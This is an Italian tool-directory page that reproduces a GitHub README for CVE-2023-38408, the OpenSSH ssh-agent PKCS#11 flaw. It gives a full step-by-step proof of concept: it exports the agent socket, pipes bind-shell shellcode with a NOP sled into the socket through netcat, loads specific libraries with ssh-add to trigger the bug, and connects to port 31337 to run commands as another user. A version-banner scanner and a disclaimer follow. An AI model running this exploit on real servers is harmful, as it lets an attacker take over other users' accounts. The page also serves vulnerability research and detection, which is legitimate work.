Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-38408 — CVE-2023-38408 Scanner di vulnerabilità SSH & PoC | Kitploit
Strumenti/GitHubGitHub/tx-one/cve-2023-38408
Scanner di VulnerabilitàGenerazione di PayloadExploitShellcodePenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubtx-one/cve-2023-38408

CVE-2023-38408

CVE-2023-38408 Scanner di vulnerabilità SSH & PoC

Vedi Repository
71 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Vulnerabilità OpenSSH - CVE-2023-38408 📚

Introduzione

È stata trovata una vulnerabilità in OpenSSH (versioni precedenti alla 9.3p2). La funzionalità PKCS#11 in ssh-agent in OpenSSH ha un percorso di ricerca non sufficientemente affidabile, portando a esecuzione remota di codice se un agente viene inoltrato a un sistema controllato dall'attaccante (il codice in /usr/lib non è necessariamente sicuro da caricare in ssh-agent). Questa falla consente a un attaccante con il controllo della agent-socket inoltrata sul server e la capacità di scrivere sul filesystem del host client di eseguire codice arbitrario con i privilegi dell'utente che esegue ssh-agent.

Nell'esempio seguente, possiamo osservare brevemente i passaggi dall'esplorazione al compromettere l'utente di alice.

  • Passo 1 - L'utente Attaccante si connette via SSH al server.
  • Passo 2 - L'utente Alice è anch'esso connesso via ssh al server.
  • Passo 3 - L'attaccante crea lo shellcode da inviare tramite processo ssh al server di destinazione.
  • Passo 4 - Lo shellcode inviato dall'attaccante sfrutta la vulnerabilità PKCS#11 di ssh-agent e crea un nuovo processo dirottando l'accesso ssh dell'utente Alice.
  • Passo 5 - Sempre tramite l'accesso normale dell'attaccante, è possibile eseguire comandi operativi come utente Alice, accedendo allo exploit creato nello shellcode tramite nc localhost 31337.

Come fare? creiamo il POC

Come menzionato prima, in questo POC useremo 2 utenti connessi a un server via SSH. Per seguire i passaggi seguenti, assumiamo che i 2 utenti abbiano già accesso al server (SSH).

  1. Ottieni il PID dell'agente SSH in esecuzione sulla macchina attaccante remota ed esportalo in una variabile d'ambiente. Abbiamo anche aggiunto tramite ssh-add il file linuxx64.elf.stub (UEFI boot stub)
root@kitploit:~
echo /tmp/ssh-*/agent.*
export SSH_AUTH_SOCK=/tmp/ssh-NqLP6il36s/agent.3452
ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub

  1. ora, per copiare lo shellcode nel processo usando SSH, devi seguire questi passaggi mentre sei ancora sulla macchina attaccante;
root@kitploit:~
SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
(perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$SHELLCODE") | nc -U "$SSH_AUTH_SOCK"

Infine, premi Ctrl-C per fermare il trasferimento netcat una volta che lo shellcode è stato posizionato con successo nella memoria dell'agente.

  1. In questo passaggio, caricheremo 3 file tramite ssh-add; libttcn3-rt2-dynamic.so, libKF5SonnetUi.so.5.92.0 e libns3.35-wave.so.0.0.0. Il passo successivo del processo di sfruttamento è registrare il signal handler per il segnale Segmentation Fault (SIGSEGV).

[!NOTE] Attivazione di SIGSEGV 💬
SIGSEGV è un segnale noto emesso da un processo informatico quando si verifica un riferimento di memoria non valido (segmentation fault). Al ricevimento del segnale SIGSEGV, il kernel riconosce che si è verificato un accesso a memoria non valido e procede a invocare il signal handler personalizzato piuttosto che terminare bruscamente il programma. In questo modo, l'attaccante coglie l'opportunità di manipolare l'esecuzione del programma e dirigerla verso il codice malevolo iniettato situato nel NOP sled.

root@kitploit:~
ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so
[Enter for passphrase]
ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0
[Enter for passphrase]
ssh-add -s /usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0
[Enter for passphrase]

  1. A questo punto, siamo già riusciti a sfruttare l'utente Alice tramite l'accesso ssh dell'attaccante al server, eseguendo il comando seguente creato dallo shellcode. 🔥
root@kitploit:~
nc localhost 31337

CVE-2023-38408 mi riguarda? ❓

La vulnerabilità colpisce principalmente i sistemi in cui è in uso SSH-agent di OpenSSH e la funzionalità di inoltro dell'agente è abilitata. Organizzazioni e individui che fanno affidamento su OpenSSH dovrebbero valutare prontamente le loro configurazioni per determinare la potenziale esposizione. Se il tuo sistema soddisfa le condizioni menzionate, è fondamentale agire immediatamente per mitigare il rischio associato a CVE-2023-38408.

Automazione del rilevamento della CVE con il mio strumento

Installazione

root@kitploit:~
git clone https://github.com/TX-One/CVE-2023-38408.git
cd CVE-2023-38408

Utilizzo

root@kitploit:~
python CVE-2023-38408_scanner.py -t <target> -p <port>

Flusso del protocollo

root@kitploit:~
Client                          Server
  | --- SSH-2.0-Client_Test ----> |
  | <---- SSH Server Banner ----- |

Output semplice

root@kitploit:~
TXOne SSH Vulnerability Scanner : CVE-2023-38408
Developed by TXOne

[+] Connecting to 192.168.1.100:22...
[+] Received banner: SSH-2.0-OpenSSH_9.2
[+] OpenSSH Version Detected: 9.2
[!] Vulnerable OpenSSH version detected: 9.2

Disclaimer

Questo strumento è destinato solo a test di sicurezza autorizzati e a scopi educativi. Ottieni sempre la dovuta autorizzazione prima di scansionare qualsiasi risorsa di rete.

Scarica lo strumento